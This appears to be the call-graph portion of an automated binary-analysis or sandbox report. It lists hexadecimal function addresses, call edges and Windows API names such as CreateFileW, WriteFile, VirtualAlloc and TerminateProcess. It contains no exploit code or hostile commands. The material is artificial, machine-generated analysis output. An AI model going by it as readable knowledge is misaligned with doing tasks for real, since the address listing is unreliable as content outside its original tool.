100705->101119 100706->100696 100709 70d13a 100706->100709 100707->100697 100708->100705 100710 6a7de1 59 API calls 100709->100710 100712 70d147 100710->100712 101116 703a2a 63 API calls Mailbox 100712->101116 100714 70d150 Mailbox 100714->100696 101120 71cadd 100715->101120 100717 71df33 100717->100497 100719 6a7667 59 API calls 100718->100719 100720 71c2f4 100719->100720 100721 6a7667 59 API calls 100720->100721 100722 71c2fc 100721->100722 100723 6a7667 59 API calls 100722->100723 100724 71c304 100723->100724 100725 6a9837 84 API calls 100724->100725 100746 71c312 100725->100746 100726 6a7bcc 59 API calls 100726->100746 100727 71c4fb 100728 71c528 Mailbox 100727->100728 101240 6a9a3c 59 API calls Mailbox 100727->101240 100728->100497 100729 71c4e2 101233 6a7cab 100729->101233 100731 71c4fd 100734 6a7cab 59 API calls 100731->100734 100732 6a8047 59 API calls 100732->100746 100737 71c50c 100734->100737 100736 6a7924 59 API calls 100736->100746 100740 6a7b2e 59 API calls 100737->100740 100738 6a7e4f 59 API calls 100742 71c3a9 CharUpperBuffW 100738->100742 100739 6a7b2e 59 API calls 100739->100727 100740->100727 100741 6a7e4f 59 API calls 100743 71c469 CharUpperBuffW 100741->100743 101231 6a843a 68 API calls 100742->101231 101232 6ac5a7 69 API calls 2 library calls 100743->101232 100746->100726 100746->100727 100746->100728 100746->100729 100746->100731 100746->100732 100746->100736 100746->100738 100746->100741 100747 6a7cab 59 API calls 100746->100747 100748 6a9837 84 API calls 100746->100748 100749 6a7b2e 59 API calls 100746->100749 100747->100746 100748->100746 100749->100746 100751 707962 100750->100751 100752 6c0db6 Mailbox 59 API calls 100751->100752 100753 707970 100752->100753 100754 70797e 100753->100754 100755 6a7667 59 API calls 100753->100755 100754->100497 100755->100754 100757 6a7df0 __NMSG_WRITE _memmove 100756->100757 100758 6c0db6 Mailbox 59 API calls 100757->100758 100759 6a7e2e 100758->100759 100759->100497 100761 71bcb0 100760->100761 100762 71bc96 100760->100762 101247 71a213 59 API calls Mailbox 100761->101247 101246 709e4a 89 API calls 4 library calls 100762->101246 100765 71bcbb 100766 6a9ea0 340 API calls 100765->100766 100767 71bd1c 100766->100767 100768 71bdae 100767->100768 100771 71bd5d 100767->100771 100793 71bca8 Mailbox 100767->100793 100769 71be04 100768->100769 100770 71bdb4 100768->100770 100772 6a9837 84 API calls 100769->100772 100769->100793 101268 70791a 59 API calls 100770->101268 101248 7072df 59 API calls Mailbox 100771->101248 100774 71be16 100772->100774 100777 6a7e4f 59 API calls 100774->100777 100775 71bdd7 101269 6a5d41 59 API calls Mailbox 100775->101269 100780 71be3a CharUpperBuffW 100777->100780 100779 71bd8d 101249 6af460 100779->101249 100783 71be54 100780->100783 100781 71bddf Mailbox 101270 6afce0 341 API calls 2 library calls 100781->101270 100784 71bea7 100783->100784 100785 71be5b 100783->100785 100787 6a9837 84 API calls 100784->100787 101271 7072df 59 API calls Mailbox 100785->101271 100788 71beaf 100787->100788 101272 6a9e5d 60 API calls 100788->101272 100791 71be89 100792 6af460 340 API calls 100791->100792 100792->100793 100793->100497 100794 71beb9 100794->100793 100795 6a9837 84 API calls 100794->100795 100796 71bed4 100795->100796 101273 6a5d41 59 API calls Mailbox 100796->101273 100798 71bee4 101274 6afce0 341 API calls 2 library calls 100798->101274 102387 6f60c0 100800->102387 100802 6f618c 100802->100497 100803->100522 100804->100522 100805->100497 100806->100539 100807->100529 100808->100542 100809->100497 100810->100510 100812 6a805a 100811->100812 100813 6a8052 100811->100813 100812->100524 102392 6a7f77 59 API calls 2 library calls 100813->102392 100815->100536 100816->100536 100817->100536 100818->100524 100819->100525 100820->100524 100821->100565 100822->100565 100823->100560 100824->100567 100825->100570 100826->100567 100828 6a9851 100827->100828 100840 6a984b 100827->100840 100829 6df5d3 __i64tow 100828->100829 100830 6a9899 100828->100830 100831 6a9857 __itow 100828->100831 100835 6df4da 100828->100835 100934 6c3698 83 API calls 4 library calls 100830->100934 100833 6c0db6 Mailbox 59 API calls 100831->100833 100836 6a9871 100833->100836 100837 6df552 Mailbox _wcscpy 100835->100837 100838 6c0db6 Mailbox 59 API calls 100835->100838 100839 6a7de1 59 API calls 100836->100839 100836->100840 100935 6c3698 83 API calls 4 library calls 100837->100935 100841 6df51f 100838->100841 100839->100840 100845 6a57f6 100840->100845 100842 6c0db6 Mailbox 59 API calls 100841->100842 100843 6df545 100842->100843 100843->100837 100844 6a7de1 59 API calls 100843->100844 100844->100837 100936 6a5c6f 100845->100936 100849 6a5844 100849->100592 100849->100593 100850 6a5821 100850->100849 100948 6a5610 100850->100948 100852 6a5833 100965 6a527b SetFilePointerEx SetFilePointerEx 100852->100965 100854 6a583a 100854->100849 100855 6ddc07 100854->100855 100966 70345a SetFilePointerEx SetFilePointerEx WriteFile 100855->100966 100857 6ddc37 100857->100849 100859 6a9b4d 100858->100859 100860 6a9b52 100858->100860 100859->100860 100985 6c358a 59 API calls 100859->100985 100860->100574 100863 6c0db6 Mailbox 59 API calls 100862->100863 100864 6a7688 100863->100864 100865 6c0db6 Mailbox 59 API calls 100864->100865 100866 6a7696 100865->100866 100866->100581 100868 6a7667 59 API calls 100867->100868 100869 6a45b1 100868->100869 100870 6a7667 59 API calls 100869->100870 100871 6a45b9 100870->100871 100872 6a7667 59 API calls 100871->100872 100873 6a45c1 100872->100873 100874 6a7667 59 API calls 100873->100874 100875 6a45c9 100874->100875 100876 6a45fd 100875->100876 100877 6dd4d2 100875->100877 100878 6a784b 59 API calls 100876->100878 100879 6a8047 59 API calls 100877->100879 100880 6a460b 100878->100880 100881 6dd4db 100879->100881 100999 6a7d2c 100880->100999 101006 6a7d8c 100881->101006 100884 6a4615 100885 6a784b 59 API calls 100884->100885 100886 6a4640 100884->100886 100888 6a4636 100885->100888 100889 6a465f 100886->100889 100903 6a4680 100886->100903 100905 6dd4fb 100886->100905 100892 6a7d2c 59 API calls 100888->100892 101003 6a79f2 100889->101003 100891 6a4691 100894 6a46a3 100891->100894 100897 6a8047 59 API calls 100891->100897 100892->100886 100893 6dd5cb 100895 6a7bcc 59 API calls 100893->100895 100898 6a46b3 100894->100898 100900 6a8047 59 API calls 100894->100900 100913 6dd588 100895->100913 100897->100894 100902 6a46ba 100898->100902 100904 6a8047 59 API calls 100898->100904 100899 6a784b 59 API calls 100899->100903 100900->100898 100901 6dd5b4 100901->100893 100908 6dd59f 100901->100908 100906 6a8047 59 API calls 100902->100906 100915 6a46c1 Mailbox 100902->100915 100986 6a784b 100903->100986 100904->100902 100905->100893 100905->100901 100911 6dd532 100905->100911 100906->100915 100907 6dd590 100909 6a7bcc 59 API calls 100907->100909 100910 6a7bcc 59 API calls 100908->100910 100909->100913 100910->100913 100911->100907 100916 6dd57b 100911->100916 100912 6a79f2 59 API calls 100912->100913 100913->100903 100913->100912 101019 6a7924 59 API calls 2 library calls 100913->101019 100915->100591 101010 6a7bcc 100916->101010 100919 6dec6b 100918->100919 100920 6a7b40 100918->100920 101035 6f7bdb 59 API calls _memmove 100919->101035 101029 6a7a51 100920->101029 100923 6a7b4c 100923->100600 100927 703c37 100923->100927 100924 6dec75 100925 6a8047 59 API calls 100924->100925 100926 6dec7d Mailbox 100925->100926 101036 70445a GetFileAttributesW 100927->101036 100930->100618 100931->100580 100932->100615 100933->100615 100934->100831 100935->100829 100937 6a5c88 100936->100937 100938 6a5802 100936->100938 100937->100938 100939 6a5c8d CloseHandle 100937->100939 100940 6a5c99 100938->100940 100939->100938 100941 6ddd58 100940->100941 100942 6a5cb2 CreateFileW 100940->100942 100943 6ddd5e CreateFileW 100941->100943 100945 6a5cd4 100941->100945 100942->100945 100944 6ddd84 100943->100944 100943->100945 100967 6a5aee 100944->100967 100945->100850 100949 6a562b 100948->100949 100950 6ddba5 100948->100950 100951 6a5aee 2 API calls 100949->100951 100964 6a56ba 100949->100964 100950->100964 100980 6a5cdf 100950->100980 100952 6a564d 100951->100952 100977 6a522e 100952->100977 100956 6a5664 100957 6c0db6 Mailbox 59 API calls 100956->100957 100958 6a566f 100957->100958 100959 6a522e 59 API calls 100958->100959 100960 6a567a 100959->100960 100961 6a5bc0 2 API calls 100960->100961 100962 6a56a7 100961->100962 100963 6a5aee 2 API calls 100962->100963 100963->100964 100964->100852 100965->100854 100966->100857 100974 6a5b08 100967->100974 100968 6a5b8f SetFilePointerEx 100975 6a5c4e SetFilePointerEx 100968->100975 100969 6ddd28 100976 6a5c4e SetFilePointerEx 100969->100976 100972 6ddd42 100973 6a5b63 100973->100945 100974->100968 100974->100969 100974->100973 100975->100973 100976->100972 100978 6c0db6 Mailbox 59 API calls 100977->100978 100979 6a5240 100978->100979 100979->100950 100979->100956 100981 6a5aee 2 API calls 100980->100981 100982 6a5d00 100981->100982 100983 6a5aee 2 API calls 100982->100983 100984 6a5d14 100983->100984 100984->100964 100985->100860 100987 6a785a 100986->100987 100988 6a78b7 100986->100988 100987->100988 100989 6a7865 100987->100989 100990 6a7d2c 59 API calls 100988->100990 100991 6deb09 100989->100991 100992 6a7880 100989->100992 100996 6a7888 _memmove 100990->100996 101021 6a8029 100991->101021 101020 6a7f27 59 API calls Mailbox 100992->101020 100995 6deb13 100997 6c0db6 Mailbox 59 API calls 100995->100997 100996->100891 100998 6deb33 100997->100998 101000 6a7d3a 100999->101000 101002 6a7d43 _memmove 100999->101002 101000->101002 101024 6a7e4f 101000->101024 101002->100884 101004 6a7e4f 59 API calls 101003->101004 101005 6a4669 101004->101005 101005->100899 101005->100903 101007 6a7da6 101006->101007 101009 6a7d99 101006->101009 101008 6c0db6 Mailbox 59 API calls 101007->101008 101008->101009 101009->100886 101011 6a7bd8 __NMSG_WRITE 101010->101011 101012 6a7c45 101010->101012 101014 6a7bee 101011->101014 101015 6a7c13 101011->101015 101013 6a7d2c 59 API calls 101012->101013 101018 6a7bf6 _memmove 101013->101018 101028 6a7f27 59 API calls Mailbox 101014->101028 101017 6a8029 59 API calls 101015->101017 101017->101018 101018->100913 101019->100913 101020->100996 101022 6c0db6 Mailbox 59 API calls 101021->101022 101023 6a8033 101022->101023 101023->100995 101025 6a7e5f _memmove 101024->101025 101026 6a7e62 101024->101026 101025->101002 101027 6c0db6 Mailbox 59 API calls 101026->101027 101027->101025 101028->101018 101030 6a7a5f 101029->101030 101034 6a7a85 _memmove 101029->101034 101031 6c0db6 Mailbox 59 API calls 101030->101031 101030->101034 101032 6a7ad4 101031->101032 101033 6c0db6 Mailbox 59 API calls 101032->101033 101033->101034 101034->100923 101035->100924 101037 704475 FindFirstFileW 101036->101037 101038 703c3e 101036->101038 101037->101038 101039 70448a FindClose 101037->101039 101038->100600 101038->100611 101039->101038 101078 6a7a16 101040->101078 101042 6a646a 101085 6a750f 59 API calls 2 library calls 101042->101085 101044 6a6484 Mailbox 101044->100623 101047 6ddff6 101088 6ff8aa 91 API calls 4 library calls 101047->101088 101048 6a750f 59 API calls 101051 6a6265 101048->101051 101051->101042 101051->101047 101051->101048 101054 6a7d8c 59 API calls 101051->101054 101057 6a6799 _memmove 101051->101057 101058 6ddf92 101051->101058 101062 6a7e4f 59 API calls 101051->101062 101083 6a5f6c 60 API calls 101051->101083 101084 6a5d41 59 API calls Mailbox 101051->101084 101086 6a5e72 60 API calls 101051->101086 101087 6a7924 59 API calls 2 library calls 101051->101087 101053 6de004 101089 6a750f 59 API calls 2 library calls 101053->101089 101054->101051 101056 6de01a 101056->101044 101090 6ff8aa 91 API calls 4 library calls 101057->101090 101059 6a8029 59 API calls 101058->101059 101060 6ddf9d 101059->101060 101064 6c0db6 Mailbox 59 API calls 101060->101064 101063 6a643b CharUpperBuffW 101062->101063 101063->101051 101064->101057 101067 6df7d6 101065->101067 101068 6a9aa8 101065->101068 101066 6df7e7 101070 6a7d8c 59 API calls 101066->101070 101067->101066 101069 6a7bcc 59 API calls 101067->101069 101072 6c0db6 Mailbox 59 API calls 101068->101072 101069->101066 101071 6df7f1 101070->101071 101075 6a9ad4 101071->101075 101076 6a7667 59 API calls 101071->101076 101073 6a9abb 101072->101073 101073->101071 101074 6a9ac6 101073->101074 101074->101075 101077 6a7de1 59 API calls 101074->101077 101075->100627 101076->101075 101077->101075 101079 6c0db6 Mailbox 59 API calls 101078->101079 101080 6a7a3b 101079->101080 101081 6a8029 59 API calls 101080->101081 101082 6a7a4a 101081->101082 101082->101051 101083->101051 101084->101051 101085->101044 101086->101051 101087->101051 101088->101053 101089->101056 101090->101044 101092 6a557d 101091->101092 101093 6a55a2 101091->101093 101092->101093 101096 6a558c 101092->101096 101094 6a7d8c 59 API calls 101093->101094 101101 70325e 101094->101101 101097 6a5ab8 59 API calls 101096->101097 101100 70337e 101097->101100 101099 70328d 101099->100660 101102 6a54d2 61 API calls 101100->101102 101101->101099 101113 7031fa ReadFile SetFilePointerEx 101101->101113 101114 6a7924 59 API calls 2 library calls 101101->101114 101103 70338c 101102->101103 101105 70339c Mailbox 101103->101105 101115 6a77da 61 API calls Mailbox 101103->101115 101105->100660 101106->100636 101107->100663 101108->100664 101109->100635 101110->100635 101111->100656 101112->100662 101113->101101 101114->101101 101115->101105 101116->100714 101117->100676 101118->100697 101119->100697 101121 6a9837 84 API calls 101120->101121 101122 71cb1a 101121->101122 101127 71cb61 Mailbox 101122->101127 101158 71d7a5 101122->101158 101124 71cf2e 101208 71d8c8 92 API calls Mailbox 101124->101208 101127->100717 101128 71cbb2 Mailbox 101128->101127 101131 6a9837 84 API calls 101128->101131 101145 71cdb9 101128->101145 101190 71fbce 59 API calls 2 library calls 101128->101190 101191 71cfdf 61 API calls 2 library calls 101128->101191 101129 71cf3d 101130 71cdc7 101129->101130 101132 71cf49 101129->101132 101171 71c96e 101130->101171 101131->101128 101132->101127 101137 71ce00 101186 6c0c08 101137->101186 101140 71ce33 101193 6a92ce 101140->101193 101141 71ce1a 101192 709e4a 89 API calls 4 library calls 101141->101192 101144 71ce25 GetCurrentProcess TerminateProcess 101144->101140 101145->101124 101145->101130 101150 71cfa4 101150->101127 101154 71cfb8 FreeLibrary 101150->101154 101151 71ce6b 101205 71d649 107 API calls _free 101151->101205 101154->101127 101156 71ce7c 101156->101150 101206 6a8d40 59 API calls Mailbox 101156->101206 101207 6a9d3c 60 API calls Mailbox 101156->101207 101209 71d649 107 API calls _free 101156->101209 101159 6a7e4f 59 API calls 101158->101159 101160 71d7c0 CharLowerBuffW 101159->101160 101210 6ff167 101160->101210 101164 6a7667 59 API calls 101165 71d7f9 101164->101165 101166 6a784b 59 API calls 101165->101166 101167 71d810 101166->101167 101168 6a7d2c 59 API calls 101167->101168 101169 71d81c Mailbox 101168->101169 101170 71d858 Mailbox 101169->101170 101217 71cfdf 61 API calls 2 library calls 101169->101217 101170->101128 101172 71c989 101171->101172 101173 71c9de 101171->101173 101174 6c0db6 Mailbox 59 API calls 101172->101174 101177 71da50 101173->101177 101176 71c9ab 101174->101176 101175 6c0db6 Mailbox 59 API calls 101175->101176 101176->101173 101176->101175 101178 71dc79 Mailbox 101177->101178 101185 71da73 _strcat _wcscpy __NMSG_WRITE 101177->101185 101178->101137 101179 6a9be6 59 API calls 101179->101185 101180 6a9b3c 59 API calls 101180->101185 101181 6a9b98 59 API calls 101181->101185 101182 6a9837 84 API calls 101182->101185 101183 6c571c 58 API calls __crtLCMapStringA_stat 101183->101185 101185->101178 101185->101179 101185->101180 101185->101181 101185->101182 101185->101183 101220 705887 61 API calls 2 library calls 101185->101220 101187 6c0c1d 101186->101187 101188 6c0cb5 VirtualAlloc 101187->101188 101189 6c0c83 101187->101189 101188->101189 101189->101140 101189->101141 101190->101128 101191->101128 101192->101144 101194 6a92d6 101193->101194 101195 6c0db6 Mailbox 59 API calls 101194->101195 101196 6a92e4 101195->101196 101197 6a92f0 101196->101197 101221 6a91fc 59 API calls Mailbox 101196->101221 101199 6a9050 101197->101199 101222 6a9160 101199->101222 101201 6c0db6 Mailbox 59 API calls 101203 6a90fb 101201->101203 101202 6a905f 101202->101201 101202->101203 101203->101156 101204 6a8d40 59 API calls Mailbox 101203->101204 101204->101151 101205->101156 101206->101156 101207->101156 101208->101129 101209->101156 101212 6ff192 __NMSG_WRITE 101210->101212 101211 6ff1d1 101211->101164 101211->101169 101212->101211 101213 6ff278 101212->101213 101214 6ff1c7 101212->101214 101213->101211 101219 6a78c4 61 API calls 101213->101219 101214->101211 101218 6a78c4 61 API calls 101214->101218 101217->101170 101218->101214 101219->101213 101220->101185 101221->101197 101223 6a9169 Mailbox 101222->101223 101224 6df19f 101223->101224 101229 6a9173 101223->101229 101225 6c0db6 Mailbox 59 API calls 101224->101225 101227 6df1ab 101225->101227 101226 6a917a 101226->101202 101229->101226 101230 6a9c90 59 API calls Mailbox 101229->101230 101230->101229 101231->100746 101232->100746 101234 6a7cbf 101233->101234 101235 6ded4a 101233->101235 101241 6a7c50 101234->101241 101236 6a8029 59 API calls 101235->101236 101239 6ded55 __NMSG_WRITE _memmove 101236->101239 101238 6a7cca 101238->100739 101240->100728 101242 6a7c5f __NMSG_WRITE 101241->101242 101243 6a8029 59 API calls 101242->101243 101244 6a7c70 _memmove 101242->101244 101245 6ded07 _memmove 101243->101245 101244->101238 101246->100793 101247->100765 101248->100779 101250 6af4ba 101249->101250 101251 6af650 101249->101251 101252 6e441e 101250->101252 101253 6af4c6 101250->101253 101254 6a7de1 59 API calls 101251->101254 101255 71bc6b 341 API calls 101252->101255 101364 6af290 341 API calls 2 library calls 101253->101364 101260 6af58c Mailbox 101254->101260 101257 6e442c 101255->101257 101261 6af630 101257->101261 101366 709e4a 89 API calls 4 library calls 101257->101366 101259 6af4fd 101259->101257 101259->101260 101259->101261 101266 703c37 3 API calls 101260->101266 101275 71df37 101260->101275 101278 6a4e4a 101260->101278 101284 70cb7a 101260->101284 101261->100793 101263 6af5e3 101263->101261 101365 6a9c90 59 API calls Mailbox 101263->101365 101266->101263 101268->100775 101269->100781 101270->100793 101271->100791 101272->100794 101273->100798 101274->100793 101276 71cadd 130 API calls 101275->101276 101277 71df47 101276->101277 101277->101263 101279 6a4e54 101278->101279 101281 6a4e5b 101278->101281 101367 6c53a6 101279->101367 101282 6a4e6a 101281->101282 101283 6a4e7b FreeLibrary 101281->101283 101282->101263 101283->101282 101285 6a7667 59 API calls 101284->101285 101286 70cbaf 101285->101286 101287 6a7667 59 API calls 101286->101287 101288 70cbb8 101287->101288 101289 70cbcc 101288->101289 101290 6a9b3c 59 API calls 101288->101290 101291 6a9837 84 API calls 101289->101291 101290->101289 101292 70cbe9 101291->101292 101293 70cd1a Mailbox 101292->101293 101294 70ccea 101292->101294 101295 70cc0b 101292->101295 101293->101263 101687 6a4ddd 101294->101687 101296 6a9837 84 API calls 101295->101296 101298 70cc17 101296->101298 101300 6a8047 59 API calls 101298->101300 101303 70cc23 101300->101303 101301 70cd16 101301->101293 101302 6a7667 59 API calls 101301->101302 101305 70cd4b 101302->101305 101308 70cc37 101303->101308 101309 70cc69 101303->101309 101304 6a4ddd 136 API calls 101304->101301 101306 6a7667 59 API calls 101305->101306 101307 70cd54 101306->101307 101312 6a7667 59 API calls 101307->101312 101310 6a8047 59 API calls 101308->101310 101311 6a9837 84 API calls 101309->101311 101313 70cc47 101310->101313 101314 70cc76 101311->101314 101315 70cd5d 101312->101315 101316 6a7cab 59 API calls 101313->101316 101317 6a8047 59 API calls 101314->101317 101318 6a7667 59 API calls 101315->101318 101319 70cc51 101316->101319 101320 70cc82 101317->101320 101321 70cd66 101318->101321 101322 6a9837 84 API calls 101319->101322 101820 704a31 GetFileAttributesW 101320->101820 101324 6a9837 84 API calls 101321->101324 101325 70cc5d 101322->101325 101327 70cd73 101324->101327 101329 6a7b2e 59 API calls 101325->101329 101326 70cc8b 101330 70cc9e 101326->101330 101333 6a79f2 59 API calls 101326->101333 101328 6a459b 59 API calls 101327->101328 101331 70cd8e 101328->101331 101329->101309 101332 6a9837 84 API calls 101330->101332 101339 70cca4 101330->101339 101334 6a79f2 59 API calls 101331->101334 101335 70cccb 101332->101335 101333->101330 101336 70cd9d 101334->101336 101821 7037ef 75 API calls Mailbox 101335->101821 101338 70cdd1 101336->101338 101340 6a79f2 59 API calls 101336->101340 101341 6a8047 59 API calls 101338->101341 101339->101293 101342 70cdae 101340->101342 101343 70cddf 101341->101343 101342->101338 101345 6a7bcc 59 API calls 101342->101345 101344 6a7b2e 59 API calls 101343->101344 101346 70cded 101344->101346 101348 70cdc3 101345->101348 101347 6a7b2e 59 API calls 101346->101347 101349 70cdfb 101347->101349 101350 6a7bcc 59 API calls 101348->101350 101351 6a7b2e 59 API calls 101349->101351 101350->101338 101352 70ce09 101351->101352 101353 6a9837 84 API calls 101352->101353 101354 70ce15 101353->101354 101711 704071 101354->101711 101356 70ce26 101357 703c37 3 API calls 101356->101357 101358 70ce30 101357->101358 101359 6a9837 84 API calls 101358->101359 101362 70ce61 101358->101362 101360 70ce4e 101359->101360 101765 709155 101360->101765 101363 6a4e4a 84 API calls 101362->101363 101363->101293 101364->101259 101365->101263 101366->101261 101368 6c53b2 __freefls@4 101367->101368 101369 6c53de 101368->101369 101370 6c53c6 101368->101370 101377 6c53d6 __freefls@4 101369->101377 101380 6c6c11 101369->101380 101402 6c8b28 58 API calls __getptd_noexit 101370->101402 101373 6c53cb 101403 6c8db6 9 API calls __write 101373->101403 101377->101281 101381 6c6c21 101380->101381 101382 6c6c43 EnterCriticalSection 101380->101382 101381->101382 101383 6c6c29 101381->101383 101384 6c53f0 101382->101384 101405 6c9c0b 101383->101405 101386 6c533a 101384->101386 101387 6c535d 101386->101387 101388 6c5349 101386->101388 101400 6c5359 101387->101400 101451 6c4a3d 101387->101451 101494 6c8b28 58 API calls __getptd_noexit 101388->101494 101390 6c534e 101495 6c8db6 9 API calls __write 101390->101495 101397 6c5377 101468 6d0a02 101397->101468 101399 6c537d 101399->101400 101401 6c2d55 _free 58 API calls 101399->101401 101404 6c5415 LeaveCriticalSection LeaveCriticalSection _fprintf 101400->101404 101401->101400 101402->101373 101403->101377 101404->101377 101406 6c9c1c 101405->101406 101407 6c9c2f EnterCriticalSection 101405->101407 101412 6c9c93 101406->101412 101407->101384 101409 6c9c22 101409->101407 101436 6c30b5 58 API calls 3 library calls 101409->101436 101413 6c9c9f __freefls@4 101412->101413 101414 6c9ca8 101413->101414 101415 6c9cc0 101413->101415 101437 6ca16b 58 API calls 2 library calls 101414->101437 101428 6c9ce1 __freefls@4 101415->101428 101440 6c881d 58 API calls 2 library calls 101415->101440 101417 6c9cad 101438 6ca1c8 58 API calls 7 library calls 101417->101438 101420 6c9cd5 101422 6c9cdc 101420->101422 101423 6c9ceb 101420->101423 101421 6c9cb4 101439 6c309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 101421->101439 101441 6c8b28 58 API calls __getptd_noexit 101422->101441 101426 6c9c0b __lock 58 API calls 101423->101426 101429 6c9cf2 101426->101429 101428->101409 101430 6c9cff 101429->101430 101431 6c9d17 101429->101431 101442 6c9e2b InitializeCriticalSectionAndSpinCount 101430->101442 101443 6c2d55 101431->101443 101434 6c9d0b 101449 6c9d33 LeaveCriticalSection _doexit 101434->101449 101437->101417 101438->101421 101440->101420 101441->101428 101442->101434 101444 6c2d5e RtlFreeHeap 101443->101444 101445 6c2d87 __dosmaperr 101443->101445 101444->101445 101446 6c2d73 101444->101446 101445->101434 101450 6c8b28 58 API calls __getptd_noexit 101446->101450 101448 6c2d79 GetLastError 101448->101445 101449->101428 101450->101448 101452 6c4a50 101451->101452 101456 6c4a74 101451->101456 101453 6c46e6 __flswbuf 58 API calls 101452->101453 101452->101456 101454 6c4a6d 101453->101454 101496 6cd886 101454->101496 101457 6d0b77 101456->101457 101458 6c5371 101457->101458 101459 6d0b84 101457->101459 101461 6c46e6 101458->101461 101459->101458 101460 6c2d55 _free 58 API calls 101459->101460 101460->101458 101462 6c4705 101461->101462 101463 6c46f0 101461->101463 101462->101397 101642 6c8b28 58 API calls __getptd_noexit 101463->101642 101465 6c46f5 101643 6c8db6 9 API calls __write 101465->101643 101467 6c4700 101467->101397 101469 6d0a0e __freefls@4 101468->101469 101470 6d0a1b 101469->101470 101471 6d0a32 101469->101471 101659 6c8af4 58 API calls __getptd_noexit 101470->101659 101473 6d0abd 101471->101473 101474 6d0a42 101471->101474 101664 6c8af4 58 API calls __getptd_noexit 101473->101664 101477 6d0a6a 101474->101477 101478 6d0a60 101474->101478 101476 6d0a20 101660 6c8b28 58 API calls __getptd_noexit 101476->101660 101482 6cd206 ___lock_fhandle 59 API calls 101477->101482 101661 6c8af4 58 API calls __getptd_noexit 101478->101661 101479 6d0a65 101665 6c8b28 58 API calls __getptd_noexit 101479->101665 101484 6d0a70 101482->101484 101486 6d0a8e 101484->101486 101487 6d0a83 101484->101487 101485 6d0ac9 101666 6c8db6 9 API calls __write 101485->101666 101662 6c8b28 58 API calls __getptd_noexit 101486->101662 101644 6d0add 101487->101644 101488 6d0a27 __freefls@4 101488->101399 101492 6d0a89 101663 6d0ab5 LeaveCriticalSection __unlock_fhandle 101492->101663 101494->101390 101495->101400 101497 6cd892 __freefls@4 101496->101497 101498 6cd89f 101497->101498 101499 6cd8b6 101497->101499 101597 6c8af4 58 API calls __getptd_noexit 101498->101597 101501 6cd955 101499->101501 101503 6cd8ca 101499->101503 101603 6c8af4 58 API calls __getptd_noexit 101501->101603 101502 6cd8a4 101598 6c8b28 58 API calls __getptd_noexit 101502->101598 101506 6cd8e8 101503->101506 101507 6cd8f2 101503->101507 101599 6c8af4 58 API calls __getptd_noexit 101506->101599 101524 6cd206 101507->101524 101508 6cd8ed 101604 6c8b28 58 API calls __getptd_noexit 101508->101604 101511 6cd8f8 101513 6cd91e 101511->101513 101514 6cd90b 101511->101514 101600 6c8b28 58 API calls __getptd_noexit 101513->101600 101533 6cd975 101514->101533 101515 6cd961 101605 6c8db6 9 API calls __write 101515->101605 101519 6cd8ab __freefls@4 101519->101456 101520 6cd917 101602 6cd94d LeaveCriticalSection __unlock_fhandle 101520->101602 101521 6cd923 101601 6c8af4 58 API calls __getptd_noexit 101521->101601 101525 6cd212 __freefls@4 101524->101525 101526 6cd261 EnterCriticalSection 101525->101526 101527 6c9c0b __lock 58 API calls 101525->101527 101528 6cd287 __freefls@4 101526->101528 101529 6cd237 101527->101529 101528->101511 101530 6cd24f 101529->101530 101606 6c9e2b InitializeCriticalSectionAndSpinCount 101529->101606 101607 6cd28b LeaveCriticalSection _doexit 101530->101607 101534 6cd982 __write_nolock 101533->101534 101535 6cd9e0 101534->101535 101536 6cd9c1 101534->101536 101564 6cd9b6 101534->101564 101539 6cda38 101535->101539 101540 6cda1c 101535->101540 101617 6c8af4 58 API calls __getptd_noexit 101536->101617 101544 6cda51 101539->101544 101623 6d18c1 60 API calls 2 library calls 101539->101623 101620 6c8af4 58 API calls __getptd_noexit 101540->101620 101541 6ce1d6 101541->101520 101542 6cd9c6 101618 6c8b28 58 API calls __getptd_noexit 101542->101618 101608 6d5c6b 101544->101608 101546 6cda21 101621 6c8b28 58 API calls __getptd_noexit 101546->101621 101548 6cd9cd 101619 6c8db6 9 API calls __write 101548->101619 101552 6cda5f 101553 6cddb8 101552->101553 101624 6c99ac 58 API calls 2 library calls 101552->101624 101555 6ce14b WriteFile 101553->101555 101556 6cddd6 101553->101556 101554 6cda28 101622 6c8db6 9 API calls __write 101554->101622 101559 6cddab GetLastError 101555->101559 101565 6cdd78 101555->101565 101560 6cdefa 101556->101560 101568 6cddec 101556->101568 101559->101565 101571 6cdfef 101560->101571 101573 6cdf05 101560->101573 101561 6cda8b GetConsoleMode 101561->101553 101563 6cdaca 101561->101563 101562 6ce184 101562->101564 101629 6c8b28 58 API calls __getptd_noexit 101562->101629 101563->101553 101566 6cdada GetConsoleCP 101563->101566 101631 6cc5f6 101564->101631 101565->101562 101565->101564 101570 6cded8 101565->101570 101566->101562 101594 6cdb09 101566->101594 101567 6cde5b WriteFile 101567->101559 101572 6cde98 101567->101572 101568->101562 101568->101567 101575 6ce17b 101570->101575 101576 6cdee3 101570->101576 101571->101562 101577 6ce064 WideCharToMultiByte 101571->101577 101572->101568 101578 6cdebc 101572->101578 101573->101562 101579 6cdf6a WriteFile 101573->101579 101574 6ce1b2 101630 6c8af4 58 API calls __getptd_noexit 101574->101630 101628 6c8b07 58 API calls __dosmaperr 101575->101628 101626 6c8b28 58 API calls __getptd_noexit 101576->101626 101577->101559 101589 6ce0ab 101577->101589 101578->101565 101579->101559 101581 6cdfb9 101579->101581 101581->101565 101581->101573 101581->101578 101584 6cdee8 101627 6c8af4 58 API calls __getptd_noexit 101584->101627 101585 6ce0b3 WriteFile 101588 6ce106 GetLastError 101585->101588 101585->101589 101588->101589 101589->101565 101589->101571 101589->101578 101589->101585 101590 6d7a5e WriteConsoleW CreateFileW __putwch_nolock 101595 6cdc5f 101590->101595 101591 6d62ba 60 API calls __write_nolock 101591->101594 101592 6cdbf2 WideCharToMultiByte 101592->101565 101593 6cdc2d WriteFile 101592->101593 101593->101559 101593->101595 101594->101565 101594->101591 101594->101592 101594->101595 101625 6c35f5 58 API calls __isleadbyte_l 101594->101625 101595->101559 101595->101565 101595->101590 101595->101594 101596 6cdc87 WriteFile 101595->101596 101596->101559 101596->101595 101597->101502 101598->101519 101599->101508 101600->101521 101601->101520 101602->101519 101603->101508 101604->101515 101605->101519 101606->101530 101607->101526 101609 6d5c76 101608->101609 101610 6d5c83 101608->101610 101638 6c8b28 58 API calls __getptd_noexit 101609->101638 101613 6d5c8f 101610->101613 101639 6c8b28 58 API calls __getptd_noexit 101610->101639 101612 6d5c7b 101612->101552 101613->101552 101615 6d5cb0 101640 6c8db6 9 API calls __write 101615->101640 101617->101542 101618->101548 101619->101564 101620->101546 101621->101554 101622->101564 101623->101544 101624->101561 101625->101594 101626->101584 101627->101564 101628->101564 